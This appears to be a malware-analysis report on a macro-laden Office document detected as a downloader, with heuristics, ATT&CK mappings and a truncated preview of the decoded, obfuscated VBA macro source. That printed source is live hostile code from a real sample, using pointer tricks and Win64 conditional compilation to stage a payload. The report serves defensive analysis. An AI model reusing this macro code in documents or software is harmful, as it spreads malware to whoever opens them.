MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening. The ClamAV heuristic also flags it as a downloader. While the VBA code is obfuscated, the presence of the Document_Open macro and the downloader heuristic strongly suggests the intent is to fetch and run a secondary payload. No specific family could be identified due to the obfuscation.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13205 bytes |
SHA-256: a61e704674f9e04c2364b338428ffb6bdb09189cb1c8ca2bd66ed79862781eb2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function headwind(bishops, garrotto, actinism)
Dim aftergame As String
Dim bissextile As String
Dim indispose As LongPtr
Dim climactic As LongPtr
Dim possibility As LongPtr
Dim fusel As Variant
Dim snatch As LongPtr
Dim extractable As LongPtr
discipleship = tail \ 194
tail = Math.Round(239)
climactic = bishops
extractable = actinism
shend = Rnd(341)
snatch = garrotto
dearest = 36 + 48
Pmt 0, dearest, 19055, 37789, 3
mainspring = adenanthera
indispose = 95 - 52 - 44
doctrinally ByVal indispose, _
climactic, _
snatch, extractable, _
possibility
tail = Rnd(352)
End Function
Function trypetidae(affectedly)
Dim otterhound As Byte
Dim translatable As String
Dim salyut As Byte
Dim blahs As String
#If (90 - 102 + 412 + 27 - 92 + 365) > ((17 - 86 + 389) - (77 - 23 + 486) * 1) And ((88 - 42 - 18) - (56 - 31 + 3)) * 2 < (Win64) Then
Dim paean As Variant
Dim polemics As LongPtr
elaine = 16 - 72 + 64
Dim compromise As LongPtr
Dim catholicon As Variant
Dim centennially As Variant
Dim grindery As LongPtr
Dim ebenaceae As Byte
ovate = VarPtr(polemics)
photostat = headwind(ovate, VarPtr(affectedly) + (84 - 44 - 32), elaine)
#ElseIf (101 - 119 + 418 + 56 - 56 + 300) > ((35 - 17 + 302) - (37 - 102 + 605) * 1) And Not ((58 - 2 - 28) - (110 - 35 - 47)) * 2 < (Win64) Then
Dim polemics As Long
elaine = 57 - 19 - 34
Dim compromise As Long
Dim grindery As Long
ovate = VarPtr(polemics)
photostat = tripping(ovate, VarPtr(affectedly) + (101 - 75 - 18), elaine)
#End If
undeservedly = 65 - 3 - 63
compromise = 66 - 17 - 49
severely = 73 - 53 - 20
grindery = 10 - 17 + 9444
camber = 35 - 14 + 4075
barilla = 103 - 42 + 3
dinnertime = valuer(ByVal undeservedly, _
compromise, ByVal severely, grindery, ByVal camber, _
ByVal barilla)
shend = Fix(116)
oxygenase = "allodial"
#If (18 - 13 + 395 + 20 - 128 + 408) > ((2 - 74 + 392) - (13 - 20 + 547) * 1) And ((23 - 51 + 56) - (27 - 88 + 89)) * 2 < (Win64) Then
nidulariales = headwind(compromise, polemics, 107 - 28 + 5804)
#ElseIf (31 - 11 + 380 + 69 - 23 + 254) > ((97 - 112 + 335) - (29 - 43 + 554) * 1) And Not ((48 - 88 + 68) - (111 - 17 - 66)) * 2 < (Win64) Then
hypertensive = tripping(compromise, polemics, 106 - 96 + 5873)
#End If
micrometeoric = 19 + 13
Pmt 0, micrometeoric, 25720, 50442, 3
trypetidae = compromise
End Function
Sub RemovePageNumbersFromCurrentSection()
Dim ThisHeader As HeaderFooter
Dim ThisPageNumber As PageNumber
With Selection.Sections(1)
For Each ThisHeader In .Headers
For Each ThisPageNumber In ThisHeader.PageNumbers
ThisPageNumber.Delete
Next ThisPageNumber
Next ThisHeader
End With
End Sub
Function tripping(blacktopped, circus, lanky)
Dim abundance As Long
Dim carped As Integer
Dim photoelectrically As Long
Dim sago As Byte
Dim saipan As Long
Dim bottomlessness As Long
Dim aeonium As Long
Dim obliterated As Byte
Dim salable As Long
Dim doxepin As Variant
Dim blameworthy As Long
aeroplanist = Rnd(127)
adenanthera = "exigency"
abundance = blacktopped
salable = lanky
discipleship = Fix(414)
saipan = circus
corners = 19 + 3
Pmt 0, corners, 27439, 57255, 2
tail = Rnd(424)
photoelectrically = 62 - 31 - 32
doctrinally ByVal photoelectrically, abundance, saipan, salable, aeonium
tail = Fix(483)
End Function
Sub bicephalous()
Dim attentively As Long
Dim chartism As Long
wake.condylar.Value = Day(#12/5/2013#)
varday = scaramouch = "marattiaceae"
party = "gysart"
bickering = "orycteropus"
comically = "blows"
crackloo = "crosse"
dispraise = congenialness
palanquin = "ampulla"
Set departer = wake.condylar.SelectedItem
scotch = 3 + 59
Pmt 0, scotch, 23121, 25463, 3
laryngeal = departer.Name
query = 68 - 88 + 7864
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.